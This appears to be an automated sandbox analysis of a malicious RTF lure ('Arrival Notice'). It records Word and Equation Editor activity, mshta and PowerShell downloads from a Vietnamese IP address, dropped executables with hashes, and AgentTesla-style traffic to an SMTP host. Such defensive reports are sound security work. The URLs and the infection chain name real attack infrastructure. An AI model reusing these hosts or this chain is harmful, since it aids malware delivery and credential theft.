WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184241
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184242
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1330184241
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1330184242
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184270
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184271
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184243
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184244
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1330184243
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1330184244
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184272
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184273
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184274
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184275
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184276
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184277
1640
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
EquationEditorFilesIntl_1033
1330184195
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
Zoom
200
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
CustomZoom
150
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
ShowAll
0
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
Version
3.1
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
ForceOpen
0
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
ToolbarDocked
1
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
ToolbarShown
1
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
ToolbarDockPos
1
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\General
MTUpgradeDialog
4
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes
Full
12 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes
Script
7 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes
ScriptScript
5 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes
Symbol
18 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Sizes
SubSymbol
12 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
LineSpacing
150%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
MatrixRowSpacing
150%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
MatrixColSpacing
100%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
SuperscriptHeight
45%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
SubscriptDepth
25%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
LimHeight
25%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
LimDepth
100%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
LimLineSpacing
100%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
NumerHeight
35%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
DenomDepth
100%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
FractBarOver
1 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
FractBarThick
0.5 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
SubFractBarThick
0.25 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
FenceOver
1 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
SpacingFactor
100%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
MinGap
8%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
RadicalGap
2 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
EmbellGap
1.5 pt
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Spacing
PrimeHeight
45%
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
Text
Times New Roman
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
Function
Times New Roman
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
Variable
Times New Roman,I
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
LCGreek
Symbol,I
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
UCGreek
Symbol
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
Symbol
Symbol
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
Vector
Times New Roman,B
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
Number
Times New Roman
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
User1
Courier New TUR
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Fonts
User2
Times New Roman
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Windows
EquationWindow
120,213,600,1066
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Windows
SpacingWindow
40,20,124,493
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Windows
TextLanguage
Any
1640
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Equation Editor\3.0\Options\Windows
MathLanguage
Any
2840
MsHTa.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2840
MsHTa.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2840
MsHTa.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2840
MsHTa.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2760
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2760
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing

Files activity

Executable files
4
Suspicious files
3
Text files
9
Unknown types
5

Dropped files

PID
Process
Filename
Type
3084
ufec.exe
C:\Users\admin\AppData\Roaming\local\MicrosoftVisualBasicVsa.dll
executable
MD5: 1da9b14bab582efaf3516f62224b32d7
SHA256: 8f1965758f46265104ee27a855ead8cf3b37a3408f55e4fcbc6221dd47229f0e
3084
ufec.exe
C:\Users\admin\AppData\Local\Temp\nsh847E.tmp\BgImage.dll
executable
MD5: 487368e6fce9ab9c5ea053af0990c5ef
SHA256: e27efa5dfde875bd6b826fafb4c7698db6b6e30e68715a1c03eb018e3170fc04
2760
powershell.exe
C:\Users\Public\ufec.exe
executable
MD5: e10188401461c7781338834690b66346
SHA256: f6f35c3cbf83450d1fecb7101784e6cc89fa13b994ae16199087c2c5119984d3
3084
ufec.exe
C:\Users\admin\AppData\Local\Temp\nsh847E.tmp\System.dll
executable
MD5: 0d7ad4f45dc6f5aa87f606d0331c6901
SHA256: 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
2700
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: a1310138e1d01330d6bfebdfd7856e8a
SHA256: 46594355c7cfcdfb9656003c6d9dd83e649f2b4cd5a04ee9b29910026445afd3
3084
ufec.exe
C:\Users\admin\AppData\Roaming\local\co5531copytostr.cs
text
MD5: 30b6c29d44ebb9925aac936e49243d15
SHA256: de45eed0fdf5090d35182150730933828893cc2605b4094feef712e1d382a8e4
3084
ufec.exe
C:\Users\admin\AppData\Roaming\local\Ethiopian-Goha16.psf.gz
compressed
MD5: aa2b3e550adcac3275da47411f9360d8
SHA256: c673863cdf4df310620c00d042872bd2140a749fc1c707fdbea1766b56ee6fd7
3084
ufec.exe
C:\Users\admin\AppData\Roaming\local\co1815setposition.cs
text
MD5: 01a0edc1d1b162cf7ead38488b384571
SHA256: cde70decdf82f1bdcbd3cd215a56d120030f46bbf48ba2a7a71588d96b4a777a
3084
ufec.exe
C:\Users\admin\AppData\Roaming\local\customctrlssdefig3.gif
image
MD5: 0a7ca394151431bc8162fe4fd1a3806e
SHA256: 7c7fbe89267ffc5dd80f9a3af213d08cb8930bfe00ba9a0706d3f31617b50122
3084
ufec.exe
C:\Users\admin\AppData\Roaming\local\ssmport3.hxc
xml
MD5: 87510e466a5eb296a60719d6805e860e
SHA256: 1fa25d7d0220de4d14f5df3b9c14c6226f7e64044e51cecc9360217bb115788f
2700
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR63B6.tmp.cvr
––
MD5:  ––
SHA256:  ––
2700
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Arrival Notice.doc.rtf.LNK
lnk
MD5: 873085238ec31a974c6042bdbc61e353
SHA256: ead8c5c29a3990c83eacc1eff809059aee0390d8fc7e395353f7e2d192afa50f
3084
ufec.exe
C:\Users\admin\AppData\Local\Temp\DsmlPagedSearch.csproj
text
MD5: 2dd384fe6ff35b8be044fb0f017d2fc2
SHA256: ac9532c4c74213fa1b67263761a18939dc1a7adcc218b129c2f0d91130899032
2700
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A35FEBEB.wmf
wmf
MD5: a53ff3b2b74b0493cd2dd5351bcb2760
SHA256: ac5f55a119b8894f347a6e85328d4a1e7ba350e0d4ea98ce1d3b2f95faecb5f2
2760
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18726c.TMP
binary
MD5: a272b20d1454efe23a324e582f0e701d
SHA256: 68aa16559f2894a02236a7716541c3fcf362333253818fdfe6fde31c94e95051
2760
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: a272b20d1454efe23a324e582f0e701d
SHA256: 68aa16559f2894a02236a7716541c3fcf362333253818fdfe6fde31c94e95051
2760
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\01HMSYP47R6P5MFYB7EW.temp
––
MD5:  ––
SHA256:  ––
2840
MsHTa.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\hta[1]
html
MD5: b4e61a6248989a55e62a6911a7ca5629
SHA256: bb1ee67dab0fe73ee50e0b70ecf2a3ffefbbdde87717d84249d601e35f8a477b
2700
WINWORD.EXE
C:\Users\admin\Desktop\~$rival Notice.doc.rtf
pgc
MD5: fbc987173319ffb1181f31529def32c4
SHA256: a07076d623b9c77753dd62f3a2fecb6cecfe956f9b142c3c04dd7751cc516279
2700
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: bafb239a30f00a10d28d8b45ce2629e6
SHA256: ace28e8eee0d27becb0fa8ab9f1a5c91b5b9f3f80dfe5e714df8794ab39cb254
3084
ufec.exe
C:\Users\admin\AppData\Roaming\local\407dobson1.jpg
image
MD5: 11aa4e35131e85c9b131eab1e7f9e805
SHA256: dadd0634e6d6eca1813ac7008ec1178b568366ea3eed698f78e04155fbfa4840

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
2
Threats
8

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2840 MsHTa.exe GET 200 103.207.38.8:1010 http://103.207.38.8:1010/hta VN
html
malicious
2760 powershell.exe GET 200 103.207.38.8:1010 http://103.207.38.8:1010/get VN
text
malicious
–– –– GET 200 34.196.181.158:80 http://checkip.amazonaws.com/ US
text
shared

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
2840 MsHTa.exe 103.207.38.8:1010 VNPT Corp VN malicious
2760 powershell.exe 103.207.38.8:1010 VNPT Corp VN malicious
–– –– 34.196.181.158:80 Amazon.com, Inc. US shared
–– –– 94.46.15.55:587 Almouroltec Servicos De Informatica E Internet Lda PT malicious

DNS requests

Domain IP Reputation
checkip.amazonaws.com 34.196.181.158
18.205.71.63
3.224.145.145
18.214.132.216
52.44.169.135
52.55.255.113
shared
mail.casadavilas.com 94.46.15.55
malicious

Threats

PID Process Class Message
2840 MsHTa.exe Misc activity SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2760 powershell.exe A Network Trojan was detected ET TROJAN Windows executable base64 encoded
2760 powershell.exe Misc activity SUSPICIOUS [PTsecurity] Executable base64 Payload
–– –– A Network Trojan was detected MALWARE [PTsecurity] AgentTesla IP Check

4 ETPRO signatures available at the full report

Debug output strings

No debug info.